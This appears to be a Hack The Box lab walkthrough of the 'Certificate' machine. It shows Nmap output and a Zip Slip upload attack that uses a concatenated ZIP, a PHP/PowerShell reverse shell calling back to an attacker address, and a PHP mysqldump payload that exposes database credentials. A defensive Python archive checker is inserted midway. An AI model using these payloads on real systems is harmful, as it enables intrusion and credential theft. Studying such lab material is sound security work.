xone 3 months ago

Certificate HTB Writeup | HacktheBox | Season 8

Certificate is a Hard-difficulty Windows Active Directory machine on Hack The Box that demonstrates a series of privilege escalation techniques. This walkthrough details the complete attack path from initial foothold to domain administrator access.

Machine IP: 10.10.11.70

Initial Reconnaissance

First, let's perform a comprehensive Nmap scan to identify open ports and services:

nmap -v -sCTV -p- -T4 -Pn 10.10.11.71

The scan reveals several key services running:

Not shown: 65514 filtered tcp ports (no-response)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Apache httpd 2.4.58 (OpenSSL/3.1.3 PHP/8.0.30)
|_http-favicon: Unknown favicon MD5: FBA180716B304B231C4029637CCF6481
|_http-server-header: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Certificate | Your portal for certification
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-06-01 17:50:34Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after:  2025-11-04T03:14:54
| MD5:   0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
|_ssl-date: 2025-06-01T17:52:17+00:00; +27m32s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T17:52:17+00:00; +27m32s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after:  2025-11-04T03:14:54
| MD5:   0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T17:52:17+00:00; +27m32s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after:  2025-11-04T03:14:54
| MD5:   0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: certificate.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-06-01T17:52:17+00:00; +27m32s from scanner time.
| ssl-cert: Subject: commonName=DC01.certificate.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certificate.htb
| Issuer: commonName=Certificate-LTD-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-11-04T03:14:54
| Not valid after:  2025-11-04T03:14:54
| MD5:   0252:f5f4:2869:d957:e8fa:5c19:dfc5:d8ba
|_SHA-1: 779a:97b1:d8e4:92b5:bafe:bc02:3388:45ff:dff7:6ad2
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49692/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49693/tcp open  msrpc         Microsoft Windows RPC
49709/tcp open  msrpc         Microsoft Windows RPC
49715/tcp open  msrpc         Microsoft Windows RPC
49771/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows


Host script results:
|_clock-skew: mean: 27m31s, deviation: 1s, median: 27m31s
| smb2-time: 
|   date: 2025-06-01T17:51:35
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required


NSE: Script Post-scanning.
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
Initiating NSE at 22:54
Completed NSE at 22:54, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1167.77 seconds

Let's add the domain to our hosts file to make future access easier:

echo "10.10.11.71 certificate.htb" | sudo tee -a /etc/hosts

Initial Access

Step 1: Student Login

After completing the registration process, log in using the student credentials you created.

Step 2: Visit the Upload Page

Navigate to the following URL:

http://certificate.htb/upload.php?s_id=36

This page allows students to upload their assignment files. The system accepts multiple file formats, including PDFs and ZIP files.

Step 3: Exploring ZIP Upload Vulnerability – Zip Slip

While testing the upload functionality, I remembered a technique demonstrated by NahamSec on his YouTube channel called Zip Slip. This vulnerability involves uploading a malicious ZIP archive whose entry names contain path traversal sequences (such as ../../), so that files are written outside the intended directory and can overwrite sensitive files on the server during extraction.

📺 Recommendation: Watch NahamSec’s video on Zip Slip to understand how the attack works and why it's dangerous.


I decided to test for Zip Slip exploitation on this upload feature.

Step 4: Preparing the Malicious ZIP

1. Create a benign zip with a regular PDF file:

zip benign.zip legit.pdf

2. Create a reverse shell payload:

mkdir malicious_files
cd malicious_files
nano shell.php

Paste the following PHP file, which launches a PowerShell reverse shell back to your listener (replace YOURIP with your own address), into shell.php:

<?php
shell_exec("powershell -nop -w hidden -c \"\$client = New-Object System.Net.Sockets.TCPClient('YOURIP',4444); \$stream = \$client.GetStream(); [byte[]]\$bytes = 0..65535|%{0}; while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){; \$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0,\$i); \$sendback = (iex \$data 2>&1 | Out-String ); \$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> '; \$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2); \$stream.Write(\$sendbyte,0,\$sendbyte.Length); \$stream.Flush()}; \$client.Close()\"");
?>
3. Package the malicious payload:

zip -r malicious.zip malicious_files/

4. Combine both ZIPs into a single archive:

cat benign.zip malicious.zip > combined.zip

This combined.zip file contains both a harmless PDF and the malicious PHP reverse shell. The idea is to trick the server into extracting the payload and placing it into a web-accessible location.
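As a defensive counterpart to Step 3 and Step 4, here is an added Python checker (not code from the writeup or from the machine's application) that catches both tricks this section relies on: a concatenated archive, where the end-of-central-directory record at the tail belongs to the second ZIP and points past the benign front half, and entry names carrying traversal sequences. The fixture archives, the `.pdf`-only allowlist and every function name are assumptions made for illustration. Python's own `extractall` already strips `..` components; extractors in other languages and libraries vary, which is why the check is made explicit rather than relied upon.

```python
import io
import struct
import tempfile
import zipfile
from pathlib import Path
from typing import Optional

EOCD_SIG = b"PK\x05\x06"              # end-of-central-directory signature
EOCD_FMT = "<4sHHHHIIH"               # sig, disk, cd_disk, n_disk, n_total, cd_size, cd_offset, comment_len
EOCD_LEN = struct.calcsize(EOCD_FMT)  # 22 bytes


def build_zip(entries: dict) -> bytes:
    """Build a small in-memory archive from {name: payload} (fixture helper only)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_STORED) as zf:
        for name, payload in entries.items():
            zf.writestr(name, payload)
    return buf.getvalue()


# Constructed fixtures, not the machine's files: a harmless archive and one whose
# entry name climbs out of the extraction directory. Concatenating them mirrors
# the "cat benign.zip malicious.zip > combined.zip" step from the writeup.
BENIGN = build_zip({"legit.pdf": b"%PDF-1.4\n% constructed placeholder\n"})
HOSTILE = build_zip({"../../shell.php": b"<?php /* constructed placeholder */ ?>"})
COMBINED = BENIGN + HOSTILE


def prepended_bytes(data: bytes) -> int:
    """Bytes that precede the archive described by the last EOCD record.

    A clean archive returns 0. In a concatenated file the last EOCD belongs to
    the second archive and its central-directory offset is relative to that
    archive's own start, so the result equals the length of the first archive.
    """
    idx = data.rfind(EOCD_SIG)
    if idx < 0 or len(data) - idx < EOCD_LEN:
        raise ValueError("no end-of-central-directory record")
    fields = struct.unpack(EOCD_FMT, data[idx:idx + EOCD_LEN])
    cd_size, cd_offset = fields[5], fields[6]
    return idx - cd_size - cd_offset


def entry_names(data: bytes) -> list:
    """Entry names exactly as an EOCD-honouring extractor would see them."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return zf.namelist()


def unsafe_entries(data: bytes) -> list:
    """Entries whose name could escape the extraction root."""
    bad = []
    for name in entry_names(data):
        parts = name.replace("\\", "/").split("/")
        if name[:1] in ("/", "\\") or ".." in parts or ":" in parts[0]:
            bad.append(name)
    return bad


def verdict(data: bytes, allowed_suffixes=frozenset({".pdf"})) -> Optional[str]:
    """None if the archive is safe to extract, otherwise the reason to reject it.

    allowed_suffixes is an assumed upload policy (the portal is described as
    accepting PDFs), not something taken from the application itself.
    """
    extra = prepended_bytes(data)
    if extra:
        return f"{extra} bytes precede the archive (concatenated or polyglot ZIP)"
    bad = unsafe_entries(data)
    if bad:
        return f"path traversal in entries: {bad}"
    for name in entry_names(data):
        if not name.endswith("/") and Path(name).suffix.lower() not in allowed_suffixes:
            return f"disallowed file type inside archive: {name}"
    return None


def safe_extract(data: bytes, dest: str) -> list:
    """Extract only archives that pass verdict(); returns paths written, relative to dest."""
    reason = verdict(data)
    if reason:
        raise ValueError(reason)
    root = Path(dest).resolve()
    written = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            target = (root / info.filename).resolve()
            if target != root and root not in target.parents:  # second line of defence
                raise ValueError(f"refusing to write outside {root}: {info.filename}")
            if info.is_dir():
                target.mkdir(parents=True, exist_ok=True)
                continue
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(zf.read(info))
            written.append(str(target.relative_to(root)))
    return written


def extract_to_tempdir(data: bytes) -> list:
    """Extract into a throwaway directory and return the relative paths written."""
    with tempfile.TemporaryDirectory() as tmp:
        return safe_extract(data, tmp)


if __name__ == "__main__":
    for label, blob in (("benign.zip", BENIGN), ("combined.zip", COMBINED)):
        print(label, "->", entry_names(blob), "|", verdict(blob) or "clean")
```

Running the block shows the asymmetry the combined archive exploits: `combined.zip` starts with the bytes of the benign PDF entry, yet `entry_names` (which follows the trailing EOCD, as real extractors do) lists only `../../shell.php`. A validator that inspects the first local header and an extractor that honours the EOCD are looking at two different archives, so the prepended-bytes check, the traversal check and the extension allowlist are each applied to the same view the extractor will use.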

Step 5: Crafting a Malicious ZIP to Dump MySQL Database

Prepare a PHP file that runs mysqldump to export the database:

<?php
system('"C:\\xampp\\mysql\\bin\\mysqldump.exe" -u certificate_webapp_user -pENTER-MY-SQL-DB-PASSWORD Certificate_WEBAPP_DB > C:\\xampp\\htdocs\\certificate.htb\\static\\full_dump.sql');
?>

Save it as shell.php, then package it:

Note: fill in the MySQL username and password in the command before packaging the file.

Step 6: Exploiting the Upload Function

Upload the newzip.zip archive at:

http://certificate.htb/upload.php?s_id=36

After uploading, you’ll see a "CLICK HERE" link. Click it to navigate to the extracted file path.

Now, manually change the URL's end segment to shell.php, like this:

http://certificate.htb/extracted-path/yourfoldername/shell.php

Once accessed, this triggers the database dump into the static directory.

Step 7: Extracting Credentials

Visit the dumped SQL file:

http://certificate.htb/static/full_dump.sql

Open it in a text editor (e.g., Notepad) and search for user credentials. You should find a password hash for user Sarah.B.

Crack the hash using a tool like hashcat or john, and you’ll be able to retrieve the user flag.



